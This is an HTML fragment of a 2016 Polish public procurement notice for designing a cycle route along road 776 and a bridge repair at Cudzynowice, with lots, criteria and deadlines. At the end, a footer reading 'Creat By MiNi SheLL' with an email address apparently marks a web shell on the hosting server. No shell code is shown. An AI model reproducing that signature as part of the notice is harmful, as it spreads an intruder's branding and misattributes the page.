                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji.</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 29/12/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie 1  Obszar Natura2000 wraz z dwoma mostami oraz most w miejscowości Cudzynowice<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a. Obszar inwestycji A zlokalizowany jest na obszarze Natura2000 na terenie powiatu buskiego w miejscowości Koniecmosty, od skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776, równolegle do drogi wojewódzkiej 776, do Rynku w Wiślicy. Obszar inwestycji B zlokalizowany jest w miejscowości Cudzynowice w powiecie kazimierskim i obejmuje most na rzece Nidzicy. 
b. Projekt drogi dla rowerów w pasie drogowym drogi wojewódzkiej nr 776 (na obszarze Natura2000) winien polegać na wprowadzeniu odpowiedniego oznakowania i niwelacji wysokich krawężników. Wskazany odcinek przebiega przez dwa mosty  nad rzeką Nidą oraz małym ciekiem wodnym dopływającym do rzeki Nidy.
Projekt mostu na rzece Nidzicy w miejscowości Cudzynowice winien polegać na oczyszczeniu, odtłuszczeniu oraz konserwacji istniejącej konstrukcji metalowej. Następnie ułożeniu na istniejących belkach stalowych nowych belek poprzecznych co 1000 mm, a na nich dwóch belek podłużnych o długości 10 m oraz ułożeniu nowej nawierzchni z blachy ryflowanej o gr. 5 mm, co przy zachowaniu szerokości ścieżki 2,5 m daje powierzchnię blachy 25 m2, a także zamontowaniu balustrad mostowych o dł. 10 m i wys. 110 cm po obu stronach mostu.
c. Zamówienie obejmuje odcinki: 
- Droga wojewódzka nr 776,
- Przebieg: od skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776 w miejscowości Koniecmosty, równolegle do drogi wojewódzkiej 776, do Rynku w Wiślicy oraz most w miejscowości Cudzynowice 
- Długość (objęta opracowaniem): ok. 1,1 km, 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71220000-6, 71222100-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji.</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie 2  Lekszyce  Cudzynowice  Koniecmosty<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>a. Obszar inwestycji C zlokalizowany jest na terenie powiatu kazimierskiego, w gminie Kazimierza Wielka, od granicy z województwem małopolskim w miejscowości Lekszyce do mostu na rzece Nidzicy w miejscowości Cudzynowice.
Obszar inwestycji D zlokalizowany jest na terenie powiatu kazimierskiego oraz buskiego, od mostu na rzece Nidzicy w Cudzynowicach (gmina Kazimierza Wielka) do skrzyżowania drogi powiatowej nr 0073 z drogą wojewódzką nr 776 w miejscowości Koniecmosty (gmina Wiślica) 
b. Droga dla rowerów winna zostać zaprojektowana w pasie nieistniejącej kolejki wąskotorowej o łącznej długości ok. 31,8 km oraz po istniejących odcinkach dróg o łącznej długości ok. 5 km. Projekt powinien uwzględniać oznakowanie turystycznego szlaku, oznakowanie drogi, na której szlak został wytyczony, ustawienie wzdłuż ścieżki tablic informacyjno  edukacyjnych. Stan pasa kolejki wąskotorowej i znajdującej się w nim infrastruktury winien zostać zweryfikowany przez Wykonawcę w terenie. Wzdłuż planowanej trasy zostaną utworzone tzw. Miejsca Obsługi Rowerzystów (MOR). Obiekt MOR będzie stanowić wiata (altana) zabudowana z trzech stron (tył i boki) zapewniająca ochronę przed słońcem, deszczem i silnym wiatrem, wyposażoną w bezpłatną toaletę przenośną, a ponadto: dwie ławki, stół, tablicę informacyjną z mapą, dwa kosze na śmieci, stojak na rowery zlokalizowane na terenie o powierzchni minimum 40 m2. Możliwość oświetlenia MOR-ów z wykorzystaniem lamp ledowych.
Oznakowanie trasy powinno składać się z dwóch elementów:
oznakowania turystycznego szlaku,
oznakowania drogi, na której szlak został wytyczony.
c. Nawierzchnia asfaltowa o szerokości 2,5 m dostępnej dla rowerzystów i pieszych
d. Zaprojektowanie odtworzenia uszkodzonych lub zniszczonych nasypów kolejowych oraz ewentualne zniwelowanie nasypów kolejowych, po których planowane jest poprowadzenie trasy rowerowej.
e. Nie przewiduje się budowy odwodnienia ani kanalizacji, wyłącznie odpowiednie wyprofilowanie drogi dla rowerów.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71220000-6, 71222100-3<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 7<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji.</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>Postępowanie zostało wszczęte w dniu 2016-12-19 ogłoszeniem o numerze 369853-2016 oraz ogłoszeniem zamieszczonym na stronie internetowej: http://powiatkazimierza.wrota-swietokrzyskie.pl/70/-/asset_publisher/Mce9/content/ogloszenie-o-udzieleniu-zamowienia-1?redirect=http%3A%2F%2Fpowiatkazimierza.wrota-swietokrzyskie.pl%2F70%3Fp_p_id%3D101_INSTANCE_Mce9%26p_p_lifecycle%3D0%26p_p_state%3Dnormal%26p_p_mode%3Dview%26p_p_col_id%3Dcolumn-2%26p_p_col_count%3D1. Ogłoszenie o numerze 369853-2016 zostało przekazane na błędnym formularzu. Biorąc powyższe pod uwagę, termin na składanie ofert pozostaje bez zmian i jest zgodny z art. 43, ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, (Dz. U. z 2015 r. Nr poz. 2164 z póź. zm.)<br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com